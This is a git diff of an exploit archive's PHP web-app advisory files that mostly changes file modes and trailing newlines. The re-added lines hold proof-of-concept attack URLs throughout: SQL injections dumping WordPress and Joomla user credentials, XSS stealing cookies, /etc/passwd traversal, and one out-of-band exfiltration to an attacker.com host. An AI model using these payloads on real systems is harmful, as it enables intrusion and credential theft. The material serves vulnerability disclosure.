-user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#; \ No newline at end of file +user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#; \ No newline at end of file diff --git a/platforms/php/webapps/37902.php b/platforms/php/webapps/37902.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37903.txt b/platforms/php/webapps/37903.txt old mode 100755 new mode 100644 index 1b9e8e711..7db524421 --- a/platforms/php/webapps/37903.txt +++ b/platforms/php/webapps/37903.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected. -http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C> \ No newline at end of file +http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C> \ No newline at end of file diff --git a/platforms/php/webapps/37904.txt b/platforms/php/webapps/37904.txt old mode 100755 new mode 100644 index 908089cf1..c7d9dc4de --- a/platforms/php/webapps/37904.txt +++ b/platforms/php/webapps/37904.txt @@ -22,4 +22,4 @@ http://www.example.com/mailertest/admin/contacts.php?op=edit&id=3&form_id=2&apos http://www.example.com/mailertest/users/index.php?profile=1&form_id=2&apos;[SQLi] -http://www.example.com/mailertest/users/register.php?form_id=2&apos;[SQLi] \ No newline at end of file +http://www.example.com/mailertest/users/register.php?form_id=2&apos;[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37906.txt b/platforms/php/webapps/37906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37907.txt b/platforms/php/webapps/37907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37926.txt b/platforms/php/webapps/37926.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37927.txt b/platforms/php/webapps/37927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37928.txt b/platforms/php/webapps/37928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37929.txt b/platforms/php/webapps/37929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37930.txt b/platforms/php/webapps/37930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37931.txt b/platforms/php/webapps/37931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37932.txt b/platforms/php/webapps/37932.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37933.txt b/platforms/php/webapps/37933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37934.txt b/platforms/php/webapps/37934.txt old mode 100755 new mode 100644 index b161f3928..573d83ca0 --- a/platforms/php/webapps/37934.txt +++ b/platforms/php/webapps/37934.txt @@ -8,4 +8,4 @@ Shopp 1.0.17 is vulnerable; other versions may also be affected. http://www.example.com/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");// http://www.example.com/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf -http://www.example.com/Shopp_v1.0.17/core/model/schema.sql \ No newline at end of file +http://www.example.com/Shopp_v1.0.17/core/model/schema.sql \ No newline at end of file diff --git a/platforms/php/webapps/37935.txt b/platforms/php/webapps/37935.txt old mode 100755 new mode 100644 index f87e8709e..1dca48c97 --- a/platforms/php/webapps/37935.txt +++ b/platforms/php/webapps/37935.txt @@ -15,4 +15,4 @@ http://www.example.com/admin/index.php?Page=Addons&Addon=dynamiccontenttags&; Ac http://www.example.com/admin/index.php?Page=Addons&Addon=dynamiccontenttags&; Action=Edit&id=-1%27+UNION+Select+1,version%28%29,3,4--%20-[SQLi] http://www.example.com/admin/index.php?Page=Addons&Addon= -dynamiccontenttags&Action=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E [XSS] \ No newline at end of file +dynamiccontenttags&Action=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37936.txt b/platforms/php/webapps/37936.txt old mode 100755 new mode 100644 index 2c36aec85..f5893602a --- a/platforms/php/webapps/37936.txt +++ b/platforms/php/webapps/37936.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Open Realty 2.5.6 is vulnerable; other versions may also be affected. -http://www.example.com/open-realty2.5.6/index.php?select_users_lang=../../../../../../../boot.ini%00 \ No newline at end of file +http://www.example.com/open-realty2.5.6/index.php?select_users_lang=../../../../../../../boot.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/37938.txt b/platforms/php/webapps/37938.txt old mode 100755 new mode 100644 index 5de964174..df82af3b5 --- a/platforms/php/webapps/37938.txt +++ b/platforms/php/webapps/37938.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a OpenX 2.8.10 is vulnerable; other versions may also be affected. -http://www.example.com/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E [XSS] \ No newline at end of file +http://www.example.com/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E [XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37939.txt b/platforms/php/webapps/37939.txt old mode 100755 new mode 100644 index ed968eea1..c0b080ce5 --- a/platforms/php/webapps/37939.txt +++ b/platforms/php/webapps/37939.txt @@ -8,4 +8,4 @@ FileContral 1.0 is vulnerable; other versions may also be affected. http://www.example.com/Administrator/filemanager/filemanager.php?downfile=../../../../../etc/passwd http://www.example.com/Administrator/filemanager/filemanager.php?downfile=../../../../../../etc/passwd -http://www.example.com/Administrator/filemanager/filemanager.php?downfile=server dir/public_html/lists/config/config.php \ No newline at end of file +http://www.example.com/Administrator/filemanager/filemanager.php?downfile=server dir/public_html/lists/config/config.php \ No newline at end of file diff --git a/platforms/php/webapps/3794.txt b/platforms/php/webapps/3794.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37940.txt b/platforms/php/webapps/37940.txt old mode 100755 new mode 100644 index a3c0b7f93..f41117f12 --- a/platforms/php/webapps/37940.txt +++ b/platforms/php/webapps/37940.txt @@ -4,4 +4,4 @@ CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fa Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/cat2.php?id=1 [SQL Injection] \ No newline at end of file +http://www.example.com/cat2.php?id=1 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/37941.txt b/platforms/php/webapps/37941.txt old mode 100755 new mode 100644 index f3b9deb30..3790a3bfa --- a/platforms/php/webapps/37941.txt +++ b/platforms/php/webapps/37941.txt @@ -4,4 +4,4 @@ CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fa Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. - http://www.example.com/special.php?id=1 [SQL Injection] \ No newline at end of file + http://www.example.com/special.php?id=1 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/37942.txt b/platforms/php/webapps/37942.txt old mode 100755 new mode 100644 index d76ff92d3..574965f3f --- a/platforms/php/webapps/37942.txt +++ b/platforms/php/webapps/37942.txt @@ -4,4 +4,4 @@ CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fa Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/article.php?id=5 [SQL Injection] \ No newline at end of file +http://www.example.com/article.php?id=5 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/37943.txt b/platforms/php/webapps/37943.txt old mode 100755 new mode 100644 index 3ebf4586b..961984610 --- a/platforms/php/webapps/37943.txt +++ b/platforms/php/webapps/37943.txt @@ -6,4 +6,4 @@ A remote attacker could exploit the vulnerability using directory-traversal char WebTitan Versions prior to 3.60 are vulnerable. -http://www.example.com//logs-x.php? jaction=view&fname=../../../../../etc/passwd \ No newline at end of file +http://www.example.com//logs-x.php? jaction=view&fname=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/37944.txt b/platforms/php/webapps/37944.txt old mode 100755 new mode 100644 index f51c12414..8e6d1ff90 --- a/platforms/php/webapps/37944.txt +++ b/platforms/php/webapps/37944.txt @@ -8,4 +8,4 @@ vBSEO 3.8.7 is vulnerable; other versions may also be affected. http://www.example.com/forums/member.php?tab=friends&u=11411%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E -http://www.example.com/forum/member.php?u=1%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E \ No newline at end of file +http://www.example.com/forum/member.php?u=1%22%3E%3Cscript%3Ewindow.location%20=%20%22http://www.internot.info/forum/%22%20%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37945.txt b/platforms/php/webapps/37945.txt old mode 100755 new mode 100644 index 8fa2d181c..02735c37c --- a/platforms/php/webapps/37945.txt +++ b/platforms/php/webapps/37945.txt @@ -6,4 +6,4 @@ A successful exploit may aid in phishing attacks; other attacks are possible. SilverStripe 2.4.7 and prior are vulnerable. -http://www.example.com/index.php/Security/login?BackURL=http://example1.com \ No newline at end of file +http://www.example.com/index.php/Security/login?BackURL=http://example1.com \ No newline at end of file diff --git a/platforms/php/webapps/37946.txt b/platforms/php/webapps/37946.txt old mode 100755 new mode 100644 index 73b49b7a9..67fe01569 --- a/platforms/php/webapps/37946.txt +++ b/platforms/php/webapps/37946.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow a remote attacker to obtain sensitive informat Crayon Syntax Highlighter 1.12.1 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php \ No newline at end of file diff --git a/platforms/php/webapps/37948.txt b/platforms/php/webapps/37948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3795.txt b/platforms/php/webapps/3795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37950.txt b/platforms/php/webapps/37950.txt old mode 100755 new mode 100644 index 70dbd0938..ccd7202e0 --- a/platforms/php/webapps/37950.txt +++ b/platforms/php/webapps/37950.txt @@ -6,4 +6,4 @@ An attacker may exploit these issues to steal cookie-based authentication creden jCore 1.0pre and prior versions are vulnerable. -http://www.example.com/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27 \ No newline at end of file +http://www.example.com/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27 \ No newline at end of file diff --git a/platforms/php/webapps/37955.html b/platforms/php/webapps/37955.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37956.txt b/platforms/php/webapps/37956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37959.txt b/platforms/php/webapps/37959.txt old mode 100755 new mode 100644 index ae074a69a..2acd24ff2 --- a/platforms/php/webapps/37959.txt +++ b/platforms/php/webapps/37959.txt @@ -52,5 +52,4 @@ mysql_close($mysql); http://www.example.com/demo/demo1.png http://www.example.com/demo/demo2.png - http://www.example.com/demo/demo3.png - \ No newline at end of file + http://www.example.com/demo/demo3.png \ No newline at end of file diff --git a/platforms/php/webapps/3796.htm b/platforms/php/webapps/3796.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37960.txt b/platforms/php/webapps/37960.txt old mode 100755 new mode 100644 index 26746e454..54eb994fe --- a/platforms/php/webapps/37960.txt +++ b/platforms/php/webapps/37960.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. -http://www.example.com/path_gallery/force-download.php?file=[RFD] \ No newline at end of file +http://www.example.com/path_gallery/force-download.php?file=[RFD] \ No newline at end of file diff --git a/platforms/php/webapps/37961.txt b/platforms/php/webapps/37961.txt old mode 100755 new mode 100644 index c72e29f8f..f90a44178 --- a/platforms/php/webapps/37961.txt +++ b/platforms/php/webapps/37961.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. -http://www.example.com/path_gallery/plist.php?albumid=[SQLi] \ No newline at end of file +http://www.example.com/path_gallery/plist.php?albumid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37962.txt b/platforms/php/webapps/37962.txt old mode 100755 new mode 100644 index 991949495..0567d6c28 --- a/platforms/php/webapps/37962.txt +++ b/platforms/php/webapps/37962.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. -http://www.example.com/path_gallery/plist.php?albumid=[XSS] \ No newline at end of file +http://www.example.com/path_gallery/plist.php?albumid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37963.txt b/platforms/php/webapps/37963.txt old mode 100755 new mode 100644 index 46043a348..b22134a5e --- a/platforms/php/webapps/37963.txt +++ b/platforms/php/webapps/37963.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected. -http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi] \ No newline at end of file +http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37968.txt b/platforms/php/webapps/37968.txt old mode 100755 new mode 100644 index 26aa92a88..c2855d8cd --- a/platforms/php/webapps/37968.txt +++ b/platforms/php/webapps/37968.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CMS Mini 0.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent \ No newline at end of file +http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent \ No newline at end of file diff --git a/platforms/php/webapps/37970.html b/platforms/php/webapps/37970.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37971.html b/platforms/php/webapps/37971.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37973.txt b/platforms/php/webapps/37973.txt old mode 100755 new mode 100644 index 06e2e096f..c5274765d --- a/platforms/php/webapps/37973.txt +++ b/platforms/php/webapps/37973.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SMF 2.0.2 is vulnerable; other versions may also be affected. -http://www.example.com/ssi_examples.php?view=[Xss] \ No newline at end of file +http://www.example.com/ssi_examples.php?view=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/37974.txt b/platforms/php/webapps/37974.txt old mode 100755 new mode 100644 index ed0aceea9..65d71ab9d --- a/platforms/php/webapps/37974.txt +++ b/platforms/php/webapps/37974.txt @@ -11,4 +11,4 @@ http://www.example.com/inventory/addinventario.php?ref=555-555-0199@example.com' http://www.example.com/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB http://www.example.com/inventory/consulta_fact.php?fact_num=<script>alert(1)</script> http://www.example.com/inventory/newinventario.php?sn=<script>alert(100)</script> -http://www.example.com/inventory/newtransact.php?ref=<script>alert(100)</script> \ No newline at end of file +http://www.example.com/inventory/newtransact.php?ref=<script>alert(100)</script> \ No newline at end of file diff --git a/platforms/php/webapps/37978.txt b/platforms/php/webapps/37978.txt old mode 100755 new mode 100644 index e864ce7c9..aca09a64a --- a/platforms/php/webapps/37978.txt +++ b/platforms/php/webapps/37978.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Gramophone 0.01b1 is vulnerable; other versions may also be affected. -http://www.example.com/gramophone/index.php?rs=%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file +http://www.example.com/gramophone/index.php?rs=%3Cscript%3Ealert%281%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/37979.txt b/platforms/php/webapps/37979.txt old mode 100755 new mode 100644 index 92269c187..134293b5e --- a/platforms/php/webapps/37979.txt +++ b/platforms/php/webapps/37979.txt @@ -4,4 +4,4 @@ VicBlog is prone to multiple SQL-injection vulnerabilities because the applicati A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/domain.tld/index.php?page=posts${tag or upated_max paramater}=1[SQLi] \ No newline at end of file +http://www.example.com/domain.tld/index.php?page=posts${tag or upated_max paramater}=1[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/37983.php b/platforms/php/webapps/37983.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37989.txt b/platforms/php/webapps/37989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3799.txt b/platforms/php/webapps/3799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/37991.txt b/platforms/php/webapps/37991.txt old mode 100755 new mode 100644 index 8f21d2ead..9beebcb95 --- a/platforms/php/webapps/37991.txt +++ b/platforms/php/webapps/37991.txt @@ -10,4 +10,4 @@ http://www.example.com/WANem/index-advanced.php/"><script>alert(document.cookie) http://www.example.com/WANem/index-basic.php/"><script>alert(document.cookie);</script><p+" -http://www.example.com/WANem/status.php?interfaceList="><script>alert(document.cookie);</script><p+" \ No newline at end of file +http://www.example.com/WANem/status.php?interfaceList="><script>alert(document.cookie);</script><p+" \ No newline at end of file diff --git a/platforms/php/webapps/37992.txt b/platforms/php/webapps/37992.txt old mode 100755 new mode 100644 index 0a534f5a9..e46c12551 --- a/platforms/php/webapps/37992.txt +++ b/platforms/php/webapps/37992.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow CorePlayer 4.0.6 is vulnerable; other versions may also be affected. -http://www.example.com/core_player.swf?callback=alert(document.cookie) \ No newline at end of file +http://www.example.com/core_player.swf?callback=alert(document.cookie) \ No newline at end of file diff --git a/platforms/php/webapps/37993.txt b/platforms/php/webapps/37993.txt old mode 100755 new mode 100644 index 31356f471..32b035975 --- a/platforms/php/webapps/37993.txt +++ b/platforms/php/webapps/37993.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,concat(username,0x3D,password)/**/from/**/jos_users+--+ -http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e+--+ \ No newline at end of file +http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e+--+ \ No newline at end of file diff --git a/platforms/php/webapps/37994.txt b/platforms/php/webapps/37994.txt old mode 100755 new mode 100644 index 90b0d0fa4..abca73378 --- a/platforms/php/webapps/37994.txt +++ b/platforms/php/webapps/37994.txt @@ -8,4 +8,4 @@ NetCat CMS 5.0.1 is vulnerable; other versions may also be affected. http://www.example.com/?ââ?¬â?¢ onmouseover=ââ?¬â?¢prompt(document.cookie)ââ?¬â?¢bad=ââ?¬â?¢> -http://www.example.com/search/?search_query=ââ?¬â?¢ onmouseover=prompt(document.cookie) bad=ââ?¬â?¢ \ No newline at end of file +http://www.example.com/search/?search_query=ââ?¬â?¢ onmouseover=prompt(document.cookie) bad=ââ?¬â?¢ \ No newline at end of file diff --git a/platforms/php/webapps/37998.txt b/platforms/php/webapps/37998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3800.txt b/platforms/php/webapps/3800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38000.txt b/platforms/php/webapps/38000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38002.txt b/platforms/php/webapps/38002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38006.txt b/platforms/php/webapps/38006.txt old mode 100755 new mode 100644 index 4b7a4fa58..a6bae99d1 --- a/platforms/php/webapps/38006.txt +++ b/platforms/php/webapps/38006.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br bloofoxCMS 0.3.5 is vulnerable; other versions may also be affected. http://www.example.com/index.php?'"--><script>alert(0x0004B3)</script> -http://www.example.com/index.php?search='"--><script>alert(0x0004B3)</script> \ No newline at end of file +http://www.example.com/index.php?search='"--><script>alert(0x0004B3)</script> \ No newline at end of file diff --git a/platforms/php/webapps/38007.txt b/platforms/php/webapps/38007.txt old mode 100755 new mode 100644 index b25bd5e5f..816f07224 --- a/platforms/php/webapps/38007.txt +++ b/platforms/php/webapps/38007.txt @@ -5,4 +5,4 @@ DCForum is prone to multiple information-disclosure vulnerabilities. Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks. http://www.example.com/cgi-bin/User_info/auth_user_file.txt -http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt \ No newline at end of file +http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt \ No newline at end of file diff --git a/platforms/php/webapps/38008.txt b/platforms/php/webapps/38008.txt old mode 100755 new mode 100644 index 4422dd750..9c3ad0cac --- a/platforms/php/webapps/38008.txt +++ b/platforms/php/webapps/38008.txt @@ -4,4 +4,4 @@ The Parcoauto component for Joomla! is prone to an SQL-injection vulnerability b Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=2658810 \ No newline at end of file +http://www.example.com/index.php?option=com_parcoauto&action=scheda&idVeicolo=2658810 \ No newline at end of file diff --git a/platforms/php/webapps/38009.txt b/platforms/php/webapps/38009.txt old mode 100755 new mode 100644 index 1512986e2..7dd1d6472 --- a/platforms/php/webapps/38009.txt +++ b/platforms/php/webapps/38009.txt @@ -10,4 +10,4 @@ Exploiting these issues could allow an attacker to execute arbitrary script code AWAuctionScript 1.0 is vulnerable; other version may also be affected. -http://www.example.com/listing.php?category=Website&PageNo=-1'[SQL-Injection Vulnerability!] \ No newline at end of file +http://www.example.com/listing.php?category=Website&PageNo=-1'[SQL-Injection Vulnerability!] \ No newline at end of file diff --git a/platforms/php/webapps/38010.txt b/platforms/php/webapps/38010.txt old mode 100755 new mode 100644 index be15bb5d8..238b90c32 --- a/platforms/php/webapps/38010.txt +++ b/platforms/php/webapps/38010.txt @@ -7,4 +7,4 @@ A successful exploit may allow an attacker to compromise the application, access VeriCentre versions prior to 2.2 build 36 are vulnerable. http://www.example.com/WebConsole/terminal/paramedit.aspx?TerminalId=%27%2bconvert%28int,@ -@version%29%2b%27&ModelName=xxxx&ApplicationName=xxxx&ClusterId= \ No newline at end of file +@version%29%2b%27&ModelName=xxxx&ApplicationName=xxxx&ClusterId= \ No newline at end of file diff --git a/platforms/php/webapps/38011.txt b/platforms/php/webapps/38011.txt old mode 100755 new mode 100644 index fa59f6093..ca3948c03 --- a/platforms/php/webapps/38011.txt +++ b/platforms/php/webapps/38011.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc OrangeHRM 2.7.1-rc.1 is vulnerable; other versions may also be affected. -http://www.example.com/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) \ No newline at end of file +http://www.example.com/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) \ No newline at end of file diff --git a/platforms/php/webapps/38012.txt b/platforms/php/webapps/38012.txt old mode 100755 new mode 100644 index 658566f18..e7393efc3 --- a/platforms/php/webapps/38012.txt +++ b/platforms/php/webapps/38012.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to compromise the application, access or modi FLV Player 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,user_login,10,11,12,13,14,15,16,17 from wp_users-- \ No newline at end of file +http://www.example.com/wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,user_login,10,11,12,13,14,15,16,17 from wp_users-- \ No newline at end of file diff --git a/platforms/php/webapps/38015.txt b/platforms/php/webapps/38015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38017.txt b/platforms/php/webapps/38017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38018.txt b/platforms/php/webapps/38018.txt old mode 100755 new mode 100644 index 6d9b0c991..bbf7feef2 --- a/platforms/php/webapps/38018.txt +++ b/platforms/php/webapps/38018.txt @@ -4,4 +4,4 @@ The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnera An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/38019.txt b/platforms/php/webapps/38019.txt old mode 100755 new mode 100644 index 2ed7fd41e..fc4163694 --- a/platforms/php/webapps/38019.txt +++ b/platforms/php/webapps/38019.txt @@ -4,4 +4,4 @@ The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability bec An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL] \ No newline at end of file +http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/3802.txt b/platforms/php/webapps/3802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/38022.txt b/platforms/php/webapps/38022.txt old mode 100755 new mode 100644 index ad782b81e..9df838628 --- a/platforms/php/webapps/38022.txt +++ b/platforms/php/webapps/38022.txt @@ -4,4 +4,4 @@ The Dailyedition-mouss theme for WordPress is prone to an SQL-injection vulnerab An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users-- \ No newline at end of file +http://www.example.com/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=-78+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28user_login,user_pass%29,14,15,16,17,18,19,20+from+wp_users-- \ No newline at end of file diff --git a/platforms/php/webapps/38023.txt b/platforms/php/webapps/38023.txt old mode 100755 new mode 100644 index 4e4191908..3d11d12f3 --- a/platforms/php/webapps/38023.txt +++ b/platforms/php/webapps/38023.txt @@ -4,4 +4,4 @@ The Tagged Albums plugin for WordPress is prone to an SQL-injection vulnerabilit An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql] \ No newline at end of file +http://www.example.com/wp-content/plugins/taggedalbums/image.php?id=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/38024.txt b/platforms/php/webapps/38024.txt old mode 100755 new mode 100644 index 5df34c3b8..aeae2ff6c --- a/platforms/php/webapps/38024.txt +++ b/platforms/php/webapps/38024.txt @@ -14,4 +14,4 @@ document.write("<text>Welcome "+ foo + "</text>"); Example URI: -http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1 \ No newline at end of file +http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1 \ No newline at end of file diff --git a/platforms/php/webapps/38025.txt b/platforms/php/webapps/38025.txt old mode 100755 new mode 100644 index 5ee896c9f..28f77f173 --- a/platforms/php/webapps/38025.txt +++ b/platforms/php/webapps/38025.txt @@ -8,4 +8,4 @@ Versions Omni-Secure 5, 6 and 7 are vulnerable. http://www.example.co/mpath/lib/browsefiles.php?dir=/ 